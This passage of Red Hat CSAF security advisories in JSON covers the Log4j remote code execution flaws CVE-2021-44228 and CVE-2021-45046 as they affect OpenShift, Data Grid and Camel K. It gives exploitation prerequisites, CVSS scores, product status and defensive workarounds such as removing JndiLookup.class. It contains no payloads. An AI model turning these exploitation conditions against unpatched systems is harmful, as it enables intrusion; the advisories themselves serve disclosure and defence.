can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "known_not_affected": [ 
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T15:00:19+00:00", "details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important 
instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", 
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": 
"external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T15:00:19+00:00", "details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5107" }, { "category": "workaround", "details": "For Log4j versions up to and 
including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64", "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": 
"2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5132
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for Red Hat Data Grid is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.2 replaces Data Grid 8.2.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.2 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5132", "url": "https://access.redhat.com/errata/RHSA-2021:5132" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381\u0026product=data.grid\u0026version=8.2\u0026downloadType=patches", "url": "https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381\u0026product=data.grid\u0026version=8.2\u0026downloadType=patches" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index", "url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5132.json" } ], "title": "Red Hat Security Advisory: Red Hat Data Grid 8.2.2 security update", "tracking": { "current_release_date": "2024-12-12T01:18:29+00:00", "generator": { "date": 
"2024-12-12T01:18:29+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5132", "initial_release_date": "2021-12-14T20:03:50+00:00", "revision_history": [ { "date": "2021-12-14T20:03:50+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T20:03:50+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:29+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Data Grid 8.2.2", "product": { "name": "Red Hat Data Grid 8.2.2", "product_id": "Red Hat Data Grid 8.2.2", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_data_grid:8.2" } } } ], "category": "product_family", "name": "Red Hat JBoss Data Grid" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat Data Grid 
8.2.2" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T20:03:50+00:00", "details": "To install this update, do the following:\n \n1. Download the Data Grid 8.2.2 server patch from the customer portal[\u00b2].\n2. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on.\n3. Install the Data Grid 8.2.2 server patch. Refer to the 8.2.2 Release Notes[\u00b3] for patching instructions.\n4. 
Restart Data Grid to ensure the changes take effect.", "product_ids": [ "Red Hat Data Grid 8.2.2" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5132" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat Data Grid 8.2.2" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat Data Grid 8.2.2" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5130
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Integration Camel K that includes bug fixes. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5130", "url": "https://access.redhat.com/errata/RHSA-2021:5130" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4" }, { "category": "external", "summary": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4", "url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5130.json" } ], "title": "Red Hat Security Advisory: Red Hat Integration Camel-K 1.6.2 release and security update", "tracking": { "current_release_date": "2024-12-12T01:17:25+00:00", "generator": { "date": "2024-12-12T01:17:25+00:00", "engine": { "name": "Red Hat SDEngine", "version": 
